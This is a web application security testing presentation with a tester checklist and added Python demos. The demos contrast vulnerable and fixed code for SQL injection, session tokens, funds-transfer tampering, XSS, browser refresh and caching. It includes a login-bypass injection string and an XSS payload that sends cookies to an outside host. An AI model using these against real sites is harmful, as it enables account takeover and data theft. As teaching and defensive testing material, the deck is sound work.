
Security Testing Checklist

Web Application Security Testing

Siddharth Anbalahan
Senior Security Engineer
Agenda
 HTTP Basics
 Web Application Security Testing tools
 Our Experiences
 Security Testing Checklist
Author Bio
 Siddharth Anbalahan, Senior Security Engineer, Paladion
 Experience in 20+ software security tests
 Developed an anti-phishing toolkit and a testing checklist for thick client applications
 Co-author of "Application Security in the ISO 27001 environment" (Oct 2007) from IT Governance
 Author of several articles falling under the category of "best practices" published in Palisade
HTTP Basics
 Hyper Text Transfer Protocol
 Client uses a web browser to send requests to the web server
 The application on the web server connects to the DB using a username/password
 It queries the DB for specific information
 The DB replies with the matching row(s), which the application returns in the HTTP response
[Diagram: Browser sends Request to Web server; Web server sends Query to DB; DB returns Recordset; Web server returns Response to Browser]
HTTP Basics - Contd
 HTTP is anonymous and stateless
 No state is kept between user & server at the protocol level (a kept-alive TCP connection does not change this)
 Each request is discrete
 For a new request, the server has no way of knowing if it is related to the previous request unless the application adds something (a cookie or a token) to tie them together
 Two main request methods
 GET, when you click on a link
GET /AccountSummary?account=33445224566&type=credit_card HTTP/1.0

 POST, when you submit a form
POST /Login/Login.action HTTP/1.0

userName=paladion&userPassword=paladion123&app=sample
HTTP Basics Contd
 Cookies
 Piece of info stored on the client by the server
 Persistent –
 Text file written to the client’s hard disk
 Expiry set by the server

 Non-persistent –
 Stored in the browser’s memory
 Lost when browser is closed
HTTP Basics Contd
 User Sessions
 Managed and identified by a unique session token
 Assigned by the server when the user logs in
 Sent by the browser with every HTTP request
HTTP Basics Contd
 The session token is sent in the following ways
 In the GET/POST request as a variable
GET /ViewAccountSummary.asp?Sessionid=344475524855699&accountnum=344 HTTP/1.0
Host: www.site.com

POST /ChangePassword.asp HTTP/1.0
Host: www.site.com

sessionid=445566229530554333203&oldpass=sangita&newpass=pakala
 In the GET/POST request as a cookie
POST /TransferFunds.asp HTTP/1.0
Host: www.bank.com
Cookie: ASPSessionID=3444755248556935589933204105399

FromAcct=34455334&ToAcct=62452135&Amount=1000
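The three carrier positions above (query string, POST body, Cookie header) are what a tester has to find before attacking a session. The following is an added example, not code from the original slides: a small parser for raw HTTP/1.x requests that reports where a session-like parameter travels. The parameter names it looks for are the ones on the slides (Sessionid, ASPSessionID) plus two common defaults (JSESSIONID, PHPSESSID) added here as an assumption; the three sample requests are constructed from the slides' examples.

```python
"""Find the session token in a raw HTTP request (added example, not from the slides).

Session tokens may travel in the query string, the POST body or the Cookie
header. The parameter names below follow the slide examples plus two common
defaults; the sample requests are constructed from the slides.
"""
from urllib.parse import parse_qsl, urlsplit

SESSION_PARAM_NAMES = {"sessionid", "aspsessionid", "jsessionid", "phpsessid"}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def find_session_tokens(raw: str) -> list:
    """Return (carrier, name, value) for every session-like parameter found."""
    req = parse_request(raw)
    found = []
    for name, value in parse_qsl(urlsplit(req["target"]).query, keep_blank_values=True):
        if name.lower() in SESSION_PARAM_NAMES:
            found.append(("query", name, value))
    if req["method"] == "POST":
        # Form bodies only; the slides' examples are all urlencoded forms.
        for name, value in parse_qsl(req["body"], keep_blank_values=True):
            if name.lower() in SESSION_PARAM_NAMES:
                found.append(("body", name, value))
    for part in req["headers"].get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name.lower() in SESSION_PARAM_NAMES:
            found.append(("cookie", name, value))
    return found


# Constructed samples, built from the requests on the slides.
SAMPLES = {
    "query": ("GET /ViewAccountSummary.asp?Sessionid=344475524855699&accountnum=344 HTTP/1.0\r\n"
              "Host: www.site.com\r\n\r\n"),
    "body": ("POST /ChangePassword.asp HTTP/1.0\r\n"
             "Host: www.site.com\r\n"
             "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
             "sessionid=445566229530554333203&oldpass=sangita&newpass=pakala"),
    "cookie": ("POST /TransferFunds.asp HTTP/1.0\r\n"
               "Host: www.bank.com\r\n"
               "Cookie: ASPSessionID=3444755248556935589933204105399\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
               "FromAcct=34455334&ToAcct=62452135&Amount=1000"),
}


def carriers_used() -> dict:
    """Map each sample to the carrier(s) its session token travels in."""
    return {label: sorted({c for c, _, _ in find_session_tokens(raw)})
            for label, raw in SAMPLES.items()}


if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, find_session_tokens(raw))
```

Run the same function over each request captured in the web proxy; a token that appears in the query string is also written to server logs, proxy logs and the browser history, which is the first thing to note in a session-tracking review.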
Web Application Security Testing Tool
 Web Proxy Editor
 Tool that intercepts HTTP traffic between the browser and the server
 Lets the tester view and modify requests before they are sent to the server (and responses before they reach the browser)
[Diagram: Web Browser <-> Web Proxy <-> Server; two-way communication through the web proxy]
Web Application Security Testing Tool
Setting up the Web Proxy tool (Internet Explorer)
 Tools -> Internet Options -> Connections -> LAN Settings
 Proxy Server
 Set the address to the loopback address, i.e. 127.0.0.1, and the port to 8080 (read the proxy manual for the correct port number)
Our Experiences
 Technical Vulnerabilities
 SQL Injection
 Weak Session Tracking
 Variable Manipulation
 Cross Site Scripting
 Broken Access Control
 Sensitive data in source code
 Threats at the browser
 Browser Refresh
 Autocomplete feature
 Temporary Internet files
 Business Risks
 Access without authentication
 Siphon off funds
 Steal sensitive information
 User impersonation
 Denial of service
 Privilege escalation of user account
 Access account details of other users
Web Application
Vulnerabilities

SQL Injection
SQL Injection
 Probably the most notorious attack on applications
 Relies on manipulating SQL queries constructed by the application
Expected:
username: abc
password: test123

When submitted, the SQL query will be built up as:

select * from users where username='abc' and password='test123'
SQL Injection
 Trick to inject Structured Query Language (SQL) syntax or commands as input via web pages

The unexpected:
username: abc'; --
password: (left empty)

The following is the query sent to the DB (everything after -- is a comment, so the password check is never evaluated):

select * from users where uname='abc'; --' and password=''

 Attacker can bypass authentication, access sensitive data, modify data, cause a DoS or take over the server.

 Demo: Bypassing Login
SQL Injection
[Diagram: the expected input and the unexpected input from a malicious user, both sent to http://target.site/login.jsp; the malicious input ends in "Login Successful"]
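The bypass above and the single-quote probe from checklist item 2, as an added example that is not the slides' demo code. It runs against an in-memory SQLite database with two constructed rows; the query shape is the one on the slides (the plaintext password column is kept only so that query can be reproduced, not as a recommendation). The vulnerable login concatenates strings; the safe one binds the input as parameters.

```python
"""Login bypass by SQL injection and its fix (added example, not the slides' demo code).

Uses an in-memory SQLite database with two constructed rows. The query shape
is the one on the slides; the plaintext password column is kept only so the
slide's query can be reproduced.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("create table users (username text, password text)")
    con.executemany("insert into users values (?, ?)",
                    [("abc", "test123"), ("admin", "s3cret")])
    return con


def login_vulnerable(con, username: str, password: str) -> bool:
    """Builds the query by string concatenation, exactly as the slides describe."""
    sql = ("select * from users where username='" + username +
           "' and password='" + password + "'")
    return con.execute(sql).fetchone() is not None


def login_safe(con, username: str, password: str) -> bool:
    """Parameterised query: input is bound as data, never parsed as SQL."""
    sql = "select * from users where username=? and password=?"
    return con.execute(sql, (username, password)).fetchone() is not None


def single_quote_probe(login, con, username: str) -> bool:
    """Checklist probe: does a lone single quote make the database error out?"""
    try:
        login(con, username, "x")
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    con = make_db()
    # Expected input: the real credentials.
    print(login_vulnerable(con, "abc", "test123"))   # True
    # The unexpected: comment out the password check. The query becomes
    #   select * from users where username='abc' --' and password=''
    print(login_vulnerable(con, "abc' --", ""))      # True: logged in without a password
    print(login_safe(con, "abc' --", ""))            # False: no user is literally named "abc' --"
    # The checklist probe: a stray quote breaks the concatenated query,
    # and the resulting DB error is what a tester looks for.
    print(single_quote_probe(login_vulnerable, con, "abc'"))  # True
    print(single_quote_probe(login_safe, con, "abc'"))        # False
```

The probe result is the important part for a tester: a database error on `abc'` shows that input reaches the query as syntax, and the `--` payload then confirms the bypass. Against servers that accept stacked statements the slide's `abc'; --` form works the same way; in SQLite the comment alone is enough.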
Web Application Vulnerabilities

Weak Session Tracking
Weak Session Tracking
 An attacker cannot know another user's session token unless the application has one of these weaknesses
 Predictable session tokens
 Derived from login IDs (Alice, Bob, usr00019 etc.)
 Incremental session tokens (1111, 1112 etc.)
 Session tokens transmitted in clear text
 No expiry on logout
 No session timeout
 Session tokens reused (the same token issued across logins, or not renewed at login)
Weak Session Tracking
 Attacker can hijack sessions to
 Access another user’s account
 Escalate privileges to higher level
 Siphon off funds
 User Impersonation
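An added example (not from the slides) of the predictability checks a tester applies to tokens captured over a few successive logins; it covers the weaknesses listed above and the "random?" and "issued new on login?" questions of checklist item 4. The weak samples are constructed; the strong sample is generated with Python's secrets module to show what a good token looks like. The 64-bit threshold and the per-character entropy estimate are rough working assumptions, not a standard.

```python
"""Predictability checks for captured session tokens (added example, not from the slides).

Takes a small sample of tokens issued for successive logins and reports
login-id based tokens, incrementing tokens, reused tokens and a crude
entropy estimate. Weak samples are constructed; the strong sample comes
from the secrets module.
"""
import math
import secrets
from collections import Counter


def entropy_bits_per_char(tokens) -> float:
    """Shannon entropy of the characters seen across the whole sample."""
    counts = Counter("".join(tokens))
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def assess_tokens(tokens, login_ids=(), min_bits=64) -> list:
    """Return a list of findings; an empty list means nothing obvious is wrong."""
    findings = []
    if len(set(tokens)) != len(tokens):
        findings.append("same token issued for different logins")
    for lid in login_ids:
        if any(lid.lower() in t.lower() for t in tokens):
            findings.append(f"token embeds login id '{lid}'")
            break
    if len(tokens) > 1 and all(t.isdigit() for t in tokens):
        diffs = {int(b) - int(a) for a, b in zip(tokens, tokens[1:])}
        if len(diffs) == 1 and diffs != {0}:
            findings.append("tokens increase by a constant step")
    # Rough strength estimate: per-character entropy times the shortest token.
    est = entropy_bits_per_char(tokens) * min(len(t) for t in tokens)
    if est < min_bits:
        findings.append(f"estimated {est:.0f} bits of entropy, below {min_bits}")
    return findings


# Constructed samples: what a tester might see over a few logins.
INCREMENTAL = ["1111", "1112", "1113", "1114"]
LOGIN_BASED = ["sess_Alice_1", "sess_Bob_1", "sess_usr00019_1"]
REUSED = ["8f3a9c", "8f3a9c", "8f3a9c"]


def strong_sample(n=4) -> list:
    """128-bit tokens from a CSPRNG, the kind a server should issue."""
    return [secrets.token_hex(16) for _ in range(n)]


if __name__ == "__main__":
    for name, sample in [("incremental", INCREMENTAL), ("login based", LOGIN_BASED),
                         ("reused", REUSED), ("strong", strong_sample())]:
        print(name, assess_tokens(sample, login_ids=("Alice", "Bob")))
```

Four tokens are enough to catch the gross failures the slides list; a proper randomness assessment needs hundreds of samples and the sequencer built into a tool such as Burp Suite, which the tools slide at the end recommends.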
Variable Manipulation
 Simplest form of application attack: the bread-and-butter hack
 Fiddle around with variables
 URL query strings
 HTML text fields, checkboxes, drop-down lists, hidden fields, etc.
 Classic examples
GET /user/ViewDetails.asp?accountnum=34455334

POST /TransferFunds.jsp HTTP/1.0

amount=100&from=34455334&to=34551231
Variable Manipulation
 The Challenge
 Many variables to play with
 Target business logic: the interesting variables
 FromAcct
 Amount
 Manipulate multiple variables simultaneously
 Attacker can siphon off funds, commit fraudulent transactions, exceed or bypass business limits.
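The transfer request above, as an added example that is not the slides' code: a toy server-side handler that trusts the client-supplied `from` and `amount` fields beside one that re-checks them against the logged-in session. It answers the checklist-5 question "can A commit transactions using data of B?" for two manipulations a proxy makes trivial: swapping `from` to another user's account, and sending a negative amount to reverse the direction of the transfer. Account numbers follow the slides; owners, balances and the daily limit are constructed.

```python
"""Variable manipulation on a funds transfer (added example, not from the slides).

Models the slide's POST /TransferFunds request. The session tells the server
who is logged in; 'from', 'to' and 'amount' arrive from the client and can be
rewritten in a web proxy. Account data and the daily limit are constructed.
"""
from decimal import Decimal, InvalidOperation

DAILY_LIMIT = Decimal("1000")


def fresh_accounts() -> dict:
    """Constructed account table: account number -> owner and balance."""
    return {"34455334": {"owner": "alice", "balance": Decimal("500")},
            "34551231": {"owner": "bob", "balance": Decimal("50")}}


def transfer_vulnerable(accounts, session_user, params) -> str:
    """Checks only that someone is logged in, then trusts every client variable."""
    if not session_user:
        return "error: not logged in"
    src, dst = accounts[params["from"]], accounts[params["to"]]
    amount = Decimal(params["amount"])            # client-side JavaScript "validated" it
    src["balance"] -= amount
    dst["balance"] += amount
    return "ok"


def transfer_safe(accounts, session_user, params) -> str:
    """Re-validates ownership, range and business limits on the server."""
    if not session_user:
        return "error: not logged in"
    src = accounts.get(params.get("from"))
    dst = accounts.get(params.get("to"))
    if src is None or dst is None or src is dst:
        return "error: unknown account"
    if src["owner"] != session_user:              # the check the attack relies on missing
        return "error: not your account"
    try:
        amount = Decimal(str(params.get("amount", "")))
    except InvalidOperation:
        return "error: bad amount"
    if not amount.is_finite() or amount <= 0 or amount > DAILY_LIMIT:
        return "error: amount out of range"
    if amount > src["balance"]:
        return "error: insufficient funds"
    src["balance"] -= amount
    dst["balance"] += amount
    return "ok"


def run_attack(transfer, params, session_user="bob") -> tuple:
    """Send one manipulated request as Bob; return (result, Alice's balance, Bob's balance)."""
    accounts = fresh_accounts()
    result = transfer(accounts, session_user, params)
    return result, accounts["34455334"]["balance"], accounts["34551231"]["balance"]


if __name__ == "__main__":
    # Bob is logged in but rewrites from= to Alice's account number in the proxy.
    steal = {"from": "34455334", "to": "34551231", "amount": "100"}
    print(run_attack(transfer_vulnerable, steal))  # ('ok', 400, 150): Alice pays Bob
    print(run_attack(transfer_safe, steal))        # ('error: not your account', 500, 50)
    # Bob sends a negative amount from his own account to pull money in.
    negative = {"from": "34551231", "to": "34455334", "amount": "-100"}
    print(run_attack(transfer_vulnerable, negative))  # ('ok', 400, 150)
    print(run_attack(transfer_safe, negative))        # ('error: amount out of range', 500, 50)
```

The point of the safe version is that every decision is made from the session (who is logged in) and the server's own data (who owns the account, what the limit is); the client's variables are treated as a request, not as facts.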
Web Application
Vulnerabilities

Broken Access Control


Broken Access Control
 Primary Attack Vector – Forced Browsing
 Guess Unreferenced URLs
 Access to sensitive files
 Configuration or Log files
 Company or Personal Documents (Pdfs, Excel etc.)
 Classic Examples
 /admin/adduser.aspx
 /WEB-INF/database.xml
 /Finance/BalanceSheet.xls
Broken Access Control
 Attacker can use forced browsing to
 Circumvent Authentication
 Circumvent Authorization
 Steal sensitive data
Web Application
Vulnerabilities

Sensitive Data in Source Code


Sensitive Data in Source Code
 Primary attack vector: Browser View -> Source
 Sensitive data embedded in HTML source code
 Sensitive data embedded in JavaScript

validatepass('shakti456','shakti123')
JavaScript code on the change-password page that stores the previous and current passwords and validates the new password against them on the client
Registration page: JavaScript code that stores all usernames of the application

 An attacker can steal sensitive information from the source code of the application.
Web Application
Vulnerabilities

Cross Site Scripting(XSS)


XSS
 An exploit that takes advantage of sites reflecting one user's input to other users
 Posted data contains script that executes in the viewers' browsers
<script>window.navigate("http://somesite.net/steal.asp?cookie="+document.cookie)</script>
 (window.navigate is IE-specific; the same payload works in other browsers with document.location)
 Attacker can steal session tokens, data etc.
XSS
[Diagram: the attacker at attacker.com plants a malicious link on a web page or in an e-mail, e.g. http://bank.com/account.jsp?<SCRIPT>...; the user, logged in to Internet Banking at http://bank.com/login/, follows it; the script executes in the user's browser with the bank.com page and cookies, and sends the cookie to attacker.com]
XSS
 Vulnerable Targets
 User Forums
 Chat rooms
 Mail Or Messaging Facility
 Online bulletin boards
 Anything that reflects user’s input back
without validation
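The reflection described above, as an added example that is not from the slides: a forum-style post renderer that reflects stored text unchanged beside one that encodes it, run over the two payloads on the slides. The post text sits inside an HTML element body, the context `html.escape()` is designed for; attribute and script contexts need their own encoding and are an assumption not covered here. The sample posts are constructed.

```python
"""Reflected/stored XSS in a forum post renderer (added example, not from the slides).

Payloads are the ones on the slides. The post text is placed inside an HTML
element body, the context html.escape() handles; attribute and script
contexts need their own encoding and are not covered here.
"""
import html
import re

# Constructed posts as a forum would store them; the last two are the slides' payloads.
POSTS = [
    "Has anyone tried the new account summary page?",
    '<script>alert("XSS")</script>',
    '<script>window.navigate("http://somesite.net/steal.asp?cookie="+document.cookie)</script>',
]


def render_vulnerable(post: str) -> str:
    """Reflects the stored text straight into the page."""
    return '<div class="post">' + post + "</div>"


def render_safe(post: str) -> str:
    """Encodes <, >, & and quotes so the browser treats the text as data."""
    return '<div class="post">' + html.escape(post, quote=True) + "</div>"


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def executes_script(markup: str) -> bool:
    """Checklist test: did the injected <script> survive rendering as a tag?"""
    return SCRIPT_TAG.search(markup) is not None


def reflected_unescaped(response_body: str, payload: str) -> bool:
    """Tester's check on a proxied response: the payload appears verbatim."""
    return payload in response_body


def audit(render) -> list:
    """Render every post and list the ones in which script would execute."""
    return [p for p in POSTS if executes_script(render(p))]


if __name__ == "__main__":
    print(audit(render_vulnerable))   # the two script payloads
    print(audit(render_safe))         # []
    print(render_safe(POSTS[1]))      # <div class="post">&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;</div>
```

When testing, `reflected_unescaped` is the cheap first check on any page that echoes input: if the `<script>alert("XSS")</script>` probe from checklist item 3 comes back byte-for-byte, the browser will run it for every viewer of that page.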
Web Application
Vulnerabilities

Threats at the Browser


Threats at the Browser
 Autocomplete feature
 Browser Refresh
 Browser Cache
Autocomplete feature
 Allows browsers to remember form entries, usernames and passwords
 Users may inadvertently save passwords when the browser prompts them to do so
 Feature known as "Autocomplete" in IE and "Remember Passwords" in Firefox
Autocomplete feature
 A local attacker with access to the user's profile can recover the saved passwords from the browser's store, so they should be treated as stored in the clear.
Browser Refresh
 Resubmits the previous request to the server
 Headers, variables, form fields, the works
 The resubmitted request can contain sensitive data (e.g. the login credentials)
 Extract the data by intercepting the resubmission with a web proxy
Browser Refresh
 User logs out, leaves the browser open
 Press Back on the browser to reach the Welcome page
 Start interception of HTTP traffic using an HTTP proxy
 Press "Refresh" to resubmit the login request and view the user's credentials
 Demo: Back-Refresh Exploit
Browser Refresh
[Diagram: Browser sends POST with Login ID + Password; Server authenticates the user and serves the next page, www.website.com/Welcomepage.jsp. On Refresh the browser resends the same POST with Login ID + Password, which the proxy intercepts before www.website.com/Welcomepage.jsp is served again]
Browser Refresh
 A local attacker can steal passwords of
users of the application.
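The replay described above and the usual fix for it, as an added example that is not from the slides: a toy browser that records every request and replays the last one on Refresh, run against two toy applications. The vulnerable one answers the login POST with the welcome page directly, so the welcome page's "last request" is the POST with the credentials; the other answers with a 303 redirect to GET /Welcomepage.jsp (the Post/Redirect/Get pattern, an addition here, not something the slides name), so a refresh replays a credential-free GET. Paths and credentials follow the slides; the applications are constructed.

```python
"""Back-refresh on the login page and the Post/Redirect/Get fix (added example, not from the slides).

A toy browser records every request it sends and replays the last one on
refresh. One toy app serves the welcome page straight from the login POST;
the other redirects to a GET first. Paths and credentials follow the slides.
"""


class Browser:
    """Keeps the request history a real browser uses for Back and Refresh."""

    def __init__(self, app):
        self.app = app
        self.history = []       # (method, path, body) of every request sent

    def send(self, method, path, body=None):
        self.history.append((method, path, body))
        status, headers, page = self.app(method, path, body)
        if status == 303:       # follow the redirect with a fresh GET, no body
            return self.send("GET", headers["Location"])
        return page

    def refresh(self):
        """Resubmit the last request: method, body, the works."""
        method, path, body = self.history[-1]
        return self.send(method, path, body)

    def last_request(self):
        return self.history[-1]


def app_vulnerable(method, path, body):
    """Authenticates the POST and serves the welcome page in the same response."""
    if method == "POST" and path == "/Login/Login.action":
        return 200, {}, "Welcome " + body["userName"]
    if path == "/Welcomepage.jsp":
        return 200, {}, "Welcome"
    return 404, {}, "not found"


def app_prg(method, path, body):
    """Post/Redirect/Get: the POST only sets up the session and redirects."""
    if method == "POST" and path == "/Login/Login.action":
        return 303, {"Location": "/Welcomepage.jsp"}, ""
    if path == "/Welcomepage.jsp":
        return 200, {}, "Welcome"
    return 404, {}, "not found"


def replayed_by_refresh(app):
    """Log in, press Refresh, and return the request a proxy would see replayed."""
    browser = Browser(app)
    browser.send("POST", "/Login/Login.action",
                 {"userName": "paladion", "userPassword": "paladion123"})
    browser.refresh()
    return browser.last_request()


if __name__ == "__main__":
    print(replayed_by_refresh(app_vulnerable))  # ('POST', '/Login/Login.action', {...credentials...})
    print(replayed_by_refresh(app_prg))         # ('GET', '/Welcomepage.jsp', None)
```

The slide's scenario goes through Logout and Back before Refresh; the toy browser skips those steps because the request it replays is the same either way. The redirect removes the credentials from the replay; it does not remove the need to invalidate the session on logout, which is checklist item 4.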
Browser Cache
 A local store to improve performance
 The Temporary Internet Files folder in IE
 The profile's Application Data folder in Firefox
 Pages accessed over HTTPS also get cached in the local store unless the server forbids it with Cache-Control: no-store
 In IE these pages are stored in
 C:\Documents and Settings\username\Local Settings\Temporary Internet Files\
 and in Firefox in
 C:\Documents and Settings\username\Local Settings\Application Data\Mozilla\Firefox\Profiles\5rrn80xr.default\Cache
Browser Cache
 Open the application's cached pages in Notepad.
 A local attacker can steal account activities, transaction details and secrets of an application user.
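An added example (not from the slides) of the header check a tester makes on responses seen in the proxy, covering the caching slides above and checklist item 7 ("sensitive pages in browser cache?"). Only `Cache-Control: no-store` forbids storing the response; `no-cache` and an `Expires` date in the past still allow a stored copy that the browser merely revalidates. The sample header sets are constructed, and the `harden()` helper adds the directives a server should send on sensitive pages.

```python
"""Will the browser keep this page on disk? (added example, not from the slides)

Reads response headers as a tester sees them in a web proxy. Only
Cache-Control: no-store forbids storing the response; no-cache and a past
Expires still allow a stored, revalidated copy. Samples are constructed.
"""


def cache_control_directives(headers: dict) -> set:
    """Lower-cased directive names from Cache-Control, ignoring any =value part."""
    lowered = {k.lower(): v for k, v in headers.items()}
    raw = lowered.get("cache-control", "")
    return {d.strip().split("=", 1)[0].lower() for d in raw.split(",") if d.strip()}


def stored_on_disk(headers: dict) -> bool:
    """True unless the response carries Cache-Control: no-store."""
    return "no-store" not in cache_control_directives(headers)


def harden(headers: dict) -> dict:
    """Add the headers that keep a sensitive response out of persistent caches.

    Pragma and Expires are belt-and-braces for HTTP/1.0-era clients;
    no-store is the directive that matters.
    """
    fixed = {k: v for k, v in headers.items()
             if k.lower() not in ("cache-control", "pragma", "expires")}
    fixed["Cache-Control"] = "no-store, no-cache, must-revalidate, private"
    fixed["Pragma"] = "no-cache"
    fixed["Expires"] = "0"
    return fixed


# Constructed responses as a proxy might show them for a page like /account.jsp over HTTPS.
SAMPLES = {
    "no caching headers at all": {"Content-Type": "text/html"},
    "no-cache only": {"Content-Type": "text/html", "Cache-Control": "no-cache"},
    "expires in the past": {"Content-Type": "text/html",
                            "Expires": "Thu, 01 Jan 1970 00:00:00 GMT"},
    "private, max-age=0": {"Content-Type": "text/html", "Cache-Control": "private, max-age=0"},
    "no-store": {"Content-Type": "text/html", "Cache-Control": "private, no-store"},
}


def audit(samples=SAMPLES) -> list:
    """Names of the sample responses a browser may keep on disk."""
    return [name for name, h in samples.items() if stored_on_disk(h)]


if __name__ == "__main__":
    print(audit())                                             # everything except "no-store"
    print(audit({n: harden(h) for n, h in SAMPLES.items()}))   # []
```

The check is deliberately strict: a page that the browser stores and later revalidates is still sitting in the cache directory listed on the slide, which is all a local attacker needs.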
Security Testing Checklist

The Checklist
1. Authentication
 Back-refresh on login/change password page
 Autocomplete feature active
2. SQL Injection
 Are dynamic SQL queries used by the application?
 Inject single quotes (') to generate DB errors.
3. XSS
 Are there input pages that are displayed to other users?
 Inject JavaScript: <script>alert("XSS")</script>
The Checklist contd
4. Weak Session Tracking
 Session token – random?
 Session token – expires on logout?
 Session token – times out on inactivity?
 Session token – issued new on login?
 Session token – sent only over SSL/TLS?
5. Variable Manipulation
 Possible to log in as 'A' and commit transactions on behalf of 'B' using data of 'B'?
 Bypass client-side validation?
The Checklist contd
6. Broken Access Control
 Can authentication be bypassed
 With deep unreferenced links
 Direct links to sensitive files (PDFs, XLS etc.)
 Can authorization be bypassed
 By referencing administration pages
 Can sensitive data be stolen
 By referencing default application config files
 By referencing application log files
The Checklist contd
7. Sensitive data leaking out
 HTML view source has sensitive data?
 Hard-coded secrets in JavaScript?
 Sensitive pages in browser cache?
Application Security Testing: Recommended Tools
 Web Proxy Editors
 WebScarab (http://dawes.za.net/rogan/webscarab/)
 Paros Proxy (www.parosproxy.org)
 Burp Suite (www.portswigger.net/suite/)
 Browser Extensions
 HTML Source Code Explorer (IE 5.0 and above) www.vdberg.org/~richard/htmlbar.html
 Firefox Browser Extensions (addons.mozilla.org)
 Web Spidering tools (Burp Spider, Paros Scanner)